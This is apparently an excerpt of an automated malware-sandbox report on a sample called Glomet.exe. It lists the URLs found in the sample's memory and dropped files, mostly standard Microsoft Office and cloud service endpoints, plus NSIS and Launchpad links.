      Source: Glomet.exe, Glomet.exe, 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, Glomet.exe, 0000001D.00000000.532501421.000000000040A000.00000008.00000001.01000000.0000000C.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: Glomet.exe, 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, Glomet.exe, 0000001D.00000000.532501421.000000000040A000.00000008.00000001.01000000.0000000C.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.aadrm.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.aadrm.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.cortana.ai
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.office.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.onedrive.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://augloop.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: 678899CC.htm.0.dr, Glomet[1].htm.0.dr, FF013E73.htm.0.drString found in binary or memory: https://bugs.launchpad.net/ubuntu/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://cdn.entity.
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://clients.config.office.net/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://config.edge.skype.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://cortana.ai
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://cortana.ai/api
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://cr.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://dev.cortana.ai
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://devnull.onenote.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://directory.services.
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://graph.windows.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://graph.windows.net/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://invites.office.com/
      Source: 678899CC.htm.0.dr, Glomet[1].htm.0.dr, FF013E73.htm.0.drString found in binary or memory: https://launchpad.net/bugs/1288690
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://lifecycle.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://login.windows.local
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://management.azure.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://management.azure.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://messaging.action.office.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://messaging.engagement.office.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://messaging.office.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://ncus.contentsync.
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://officeapps.live.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://onedrive.live.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://osi.office.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://otelrules.azureedge.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://outlook.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://outlook.office.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://outlook.office365.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://outlook.office365.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://roaming.edog.
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://settings.outlook.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://staging.cortana.ai
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://tasks.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://wus2.contentsync.
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://www.odwebp.svc.ms
